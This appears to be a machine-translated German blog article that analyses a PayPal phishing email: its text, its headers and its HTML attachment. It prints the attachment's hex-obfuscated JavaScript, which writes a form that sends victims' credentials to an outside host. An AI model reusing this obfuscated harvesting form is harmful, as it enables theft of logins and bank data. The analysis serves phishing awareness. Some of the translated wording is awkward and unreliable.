10Sep
In der heutigen Welt, in der alle Informationen online verfügbar sind, ist Phishing einer der beliebtesten und verheerendsten Online-Angriffe, da Sie immer einen Virus entfernen können. Wenn Ihre Bankdaten gestohlen werden, befinden Sie sich in Schwierigkeiten. Hier ist eine Zusammenfassung eines solchen Angriffs, den wir erhalten haben.
Denken Sie nicht, dass nur Ihre Bankdaten wichtig sind: Wenn jemand die Kontrolle über Ihren Konto-Login erlangt, wissen Sie nicht nur die Informationen in diesem Konto, sondern die Chancen, dass dieselben Login-Informationen auf verschiedenen Konten verwendet werdenandere Konten. Und wenn sie Ihr E-Mail-Konto gefährden, können sie alle Ihre anderen Passwörter zurücksetzen.
Neben den starken und wechselnden Passwörtern müssen Sie immer nach gefälschten E-Mails Ausschau halten, die sich als echte E-Mails tarnen. Während die meisten Phishing-Versuche amateurhaft sind, sind einige ziemlich überzeugend. Daher ist es wichtig zu verstehen, wie man sie auf der Oberfläche erkennt und wie sie unter der Haube funktionieren.
Bild von asirap
Untersuchen, was in Sicht ist
Unsere Beispiel-E-Mail "benachrichtigt" Sie, wie die meisten Phishing-Versuche, über Aktivitäten auf Ihrem PayPal-Konto, die unter normalen Umständen alarmierend wären. Der Aufruf zum Handeln besteht also darin, Ihr Konto zu überprüfen / wiederherzustellen, indem Sie so gut wie jede Information über Ihre Person einreichen, an die Sie denken können. Auch das ist ziemlich formelhaft.
Zwar gibt es sicherlich Ausnahmen, aber so ziemlich jede Phishing- und Betrugs-E-Mail wird direkt in der Nachricht mit roten Flaggen geladen. Selbst wenn der Text überzeugend ist, können Sie in der Regel viele Fehler im Nachrichtentext finden, die anzeigen, dass die Nachricht nicht echt ist.
Der Nachrichtentext
Auf den ersten Blick ist dies eine der besseren Phishing-E-Mails, die ich gesehen habe. Es gibt keine Rechtschreib- oder Grammatikfehler und das Wort liest sich entsprechend dem, was Sie erwarten könnten. Es gibt jedoch ein paar rote Fahnen, die Sie sehen können, wenn Sie den Inhalt ein wenig genauer untersuchen.
- "Paypal" - Der korrekte Fall ist "PayPal"( Kapital P).Sie können sehen, dass beide Varianten in der Nachricht verwendet werden. Unternehmen sind sehr bewusst mit ihrem Branding, so dass es zweifelhaft ist, ob so etwas den Proofing-Prozess passieren würde.
- "accept ActiveX" - Wie oft haben Sie gesehen, dass ein legales webbasiertes Unternehmen der Größe von Paypal eine proprietäre Komponente verwendet, die nur mit einem einzigen Browser funktioniert, insbesondere wenn sie mehrere Browser unterstützt? Sicher, irgendwo da draußen tut es eine Firma, aber das ist eine rote Fahne.
- "sicher." - Beachten Sie, dass dieses Wort nicht am Rand des Absatzes steht. Selbst wenn ich das Fenster ein wenig dehne, wird es nicht richtig umgebrochen oder platziert.
- "Paypal!" - Der Platz vor dem Ausrufezeichen sieht umständlich aus. Nur eine weitere Eigenart, von der ich mir sicher bin, dass sie nicht in einer echten E-Mail wäre.
- "PayPal-Account Update Form.pdf.htm" - Warum sollte Paypal eine "PDF" anhängen, besonders wenn sie einfach auf eine Seite ihrer Seite verlinken können? Warum würden sie außerdem versuchen, eine HTML-Datei als PDF zu tarnen? Dies ist die größte rote Fahne von allen.
Der Nachrichtenkopf
Wenn Sie sich den Nachrichtenkopf ansehen, erscheinen einige weitere rote Flags:
- Die Absenderadresse ist [email protected].
- Die Adresse to fehlt. Ich habe das nicht ausgeblendet, es ist einfach nicht Teil des Standardnachrichtenkopfes. Normalerweise wird eine Firma, die Ihren Namen hat, die E-Mail für Sie personalisieren.
Der Anhang
Wenn ich den Anhang öffne, sieht man sofort, dass das Layout nicht korrekt ist, da ihm Stilinformationen fehlen. Warum sollte PayPal ein HTML-Formular per E-Mail senden, wenn es Ihnen einfach einen Link auf seiner Website geben könnte?
Hinweis: verwenden wir den integrierten HTML-Anhang-Viewer von Gmail, aber wir empfehlen, dass Sie KEINE Anhänge von Scammern öffnen. Noch nie. Je. Sie enthalten oft Exploits, die Trojaner auf Ihrem PC installieren, um Ihre Kontoinformationen zu stehlen.
Wenn Sie etwas weiter blättern, sehen Sie, dass dieses Formular nicht nur nach unseren PayPal-Anmeldeinformationen fragt, sondern auch nach Bank- und Kreditkarteninformationen. Einige der Bilder sind kaputt.
Es ist offensichtlich, dass dieser Phishing-Versuch alles mit einem Schlag verfolgt.
Der technische Zusammenbruch
Obwohl es ziemlich klar sein sollte, dass dies ein Phishing-Versuch ist, werden wir jetzt die technische Zusammensetzung der E-Mail aufschlüsseln und sehen, was wir finden können.
Informationen aus dem Anhang
Als erstes sollten Sie sich die HTML-Quelle des Anhangs ansehen, die die Daten an die gefälschte Seite übermittelt.
Wenn die Quelle schnell angezeigt wird, erscheinen alle Links gültig, da sie entweder auf "paypal.com" oder "paypalobjects.com" zeigen, die beide legitim sind.
Jetzt werden wir uns einige grundlegende Seiteninformationen ansehen, die Firefox auf der Seite sammelt.
Wie Sie sehen können, werden einige der Grafiken aus den Domains "blancedtobe.com", "goodhealthpharmacy.com" und "pic-upload.de" anstelle der legitimen PayPal-Domains gezogen.
Informationen aus den E-Mail-Headern
Als nächstes betrachten wir die rohen Header der E-Mail-Nachrichten. Google Mail macht dies über die Menüoption "Original anzeigen" für die Nachricht verfügbar.
Wenn Sie die Kopfzeileninformationen für die ursprüngliche Nachricht betrachten, können Sie sehen, dass diese Nachricht mit Outlook Express 6 erstellt wurde. Ich bezweifle, dass PayPal Mitarbeiter hat, die jede dieser Nachrichten manuell über einen veralteten E-Mail-Client senden.
Wenn wir nun die Routing-Informationen betrachten, können wir die IP-Adresse sowohl des Absenders als auch des weiterleitenden Mail-Servers sehen.
Die IP-Adresse "Benutzer" ist der ursprüngliche Absender. Durch einen kurzen Blick auf die IP-Informationen können wir sehen, dass die sendende IP in Deutschland ist.
Und wenn wir uns die Mailserver-Adresse( mail.itak.at) anschauen, können wir sehen, dass dies ein ISP mit Sitz in Österreich ist. Ich bezweifle, dass PayPal seine E-Mails direkt über einen in Österreich ansässigen ISP weiterleitet, wenn sie eine riesige Serverfarm haben, die diese Aufgabe leicht bewältigen kann.
Wohin gehen die Daten?
Wir haben also eindeutig festgestellt, dass es sich um eine Phishing-E-Mail handelt, und einige Informationen darüber gesammelt, woher die Nachricht stammt. Was ist jedoch, wo Ihre Daten gesendet werden?
Um dies zu sehen, müssen wir zunächst den HTM-Anhang auf unserem Desktop speichern und in einem Texteditor öffnen. Beim Durchblättern scheint alles in Ordnung zu sein, außer wenn wir zu einem verdächtig aussehenden Javascript-Block kommen.
Wenn wir die vollständige Quelle des letzten Javascript-Blocks ausbrechen, sehen wir:
& lt; script language = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =“3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e“ y =“; for( i = 0; i & lt; x.length; i + = 2){ y + = unescape( '%' + xstr( i, 2));} document.write( y);
& lt; / script & gt;
Jedes Mal, wenn Sie eine große Anzahl von scheinbar zufälligen Buchstaben und Zahlen in einem Javascript-Block eingebettet sehen, ist es in der Regel etwas verdächtig. Mit Blick auf den Code wird die Variable "x" auf diese große Zeichenfolge gesetzt und dann in die Variable "y" dekodiert. Das Endergebnis der Variablen "y" wird dann als HTML in das Dokument geschrieben.
Da die große Zeichenfolge aus Zahlen aus 0-9 und die Buchstaben af, sie am meisten wahrscheinlich über eine einfache ASCII kodiert Hex-Konvertierung:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Verschiebt zu:
& lt; form name =“main“ id =“main“method = "post" action = "http: //www.dexposure.net/bbs/data/ verify.php" & gt;
Es ist kein Zufall, dass dies zu einem gültigen HTML-Formular-Tag wird, das die Ergebnisse nicht an PayPal, sondern an eine Schurkenseite sendet.
Wenn Sie die HTML-Quelle des Formulars anzeigen, sehen Sie außerdem, dass dieses Formular-Tag nicht sichtbar ist, da es dynamisch über das Javascript generiert wird. Dies ist eine clevere Möglichkeit, um zu verbergen, was der HTML-Code tatsächlich tut, wenn jemand die generierte Quelle des Anhangs( wie zuvor) einfach anzeigen würde, anstatt den Anhang direkt in einem Texteditor zu öffnen.
Wenn Sie eine schnelle Who-Datei auf der betreffenden Website ausführen, können wir feststellen, dass es sich um eine Domain handelt, die auf einem beliebten Web-Host, 1and1, gehostet wird.
Was herausragt ist, dass die Domain einen lesbaren Namen verwendet( im Gegensatz zu etwas wie "dfh3sjhskjhw.net") und die Domain seit 4 Jahren registriert ist. Aus diesem Grund glaube ich, dass diese Domain entführt und als Pfand für diesen Phishing-Versuch verwendet wurde.
Cynicism ist eine gute Verteidigung
Wenn es darum geht, online sicher zu bleiben, tut es nie weh, ein bisschen Zynismus zu haben.
Obwohl ich sicher bin, dass es in der Beispiel-E-Mail mehr rote Fahnen gibt, haben wir oben auf Indikatoren hingewiesen, die wir nach nur wenigen Minuten der Untersuchung gesehen haben. Wenn die Oberflächenniveau der E-Mail ihr legitimes Gegenstück zu 100% imitiert, würde die technische Analyse hypothetisch immer noch ihre wahre Natur offenbaren. Deshalb ist es wichtig zu prüfen, was Sie sehen können und was nicht.